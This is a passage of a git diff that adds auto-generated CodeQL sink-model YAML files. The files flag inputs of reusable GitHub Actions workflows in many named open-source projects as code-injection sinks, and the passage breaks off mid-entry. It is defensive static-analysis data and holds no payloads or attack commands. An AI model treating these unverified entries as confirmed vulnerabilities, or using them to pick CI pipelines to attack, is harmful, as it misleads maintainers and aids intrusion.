a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml new file mode 100644 index 00000000000..017d0bc89f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml new file mode 100644 index 00000000000..1a38d6b35ad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml new file mode 100644 index 00000000000..339d7b1dd0a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "inputs.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml new file mode 100644 index 00000000000..ff0f83454c2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml new file mode 100644 index 00000000000..c07d2aba0b6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml new file mode 100644 index 00000000000..77a7eaae309 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "inputs.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml new file mode 100644 index 00000000000..09299774b6a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -0,0 +1,29 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-toolchain", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml new file mode 100644 index 00000000000..028210d4eac --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml new file mode 100644 index 00000000000..2ea83d9d94b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml new file mode 100644 index 00000000000..69f1b740c96 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml new file mode 100644 index 00000000000..61af1d32441 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml new file mode 100644 index 00000000000..1532fc723aa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "inputs.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml new file mode 100644 index 00000000000..f4a7cd26183 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml new file mode 100644 index 00000000000..119bfeaa796 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml new file mode 100644 index 00000000000..10ea343b7aa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml new file mode 100644 index 00000000000..6310b7155d3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml new file mode 100644 index 00000000000..a1de7e9a8f9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml new file mode 100644 index 00000000000..d6e334573e4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml new file mode 100644 index 00000000000..eeff97a8aea --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "inputs.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "inputs.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml new file mode 100644 index 00000000000..34ffd6788b1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml new file mode 100644 index 00000000000..8ee00d47f79 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml new file mode 100644 index 00000000000..40b35b5c873 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml new file mode 100644 index 00000000000..c02368b5d51 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml new file mode 100644 index 00000000000..61b3e84b29e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "inputs.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml new file mode 100644 index 00000000000..72e4a3eec65 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "inputs.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml new file mode 100644 index 00000000000..5e875442771 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml new file mode 100644 index 00000000000..991743df7d2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml new file mode 100644 index 00000000000..780d95fab47 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml new file mode 100644 index 00000000000..cf69379583d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml new file mode 100644 index 00000000000..211fe546e28 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "inputs.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml new file mode 100644 index 00000000000..d59258ce992 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", 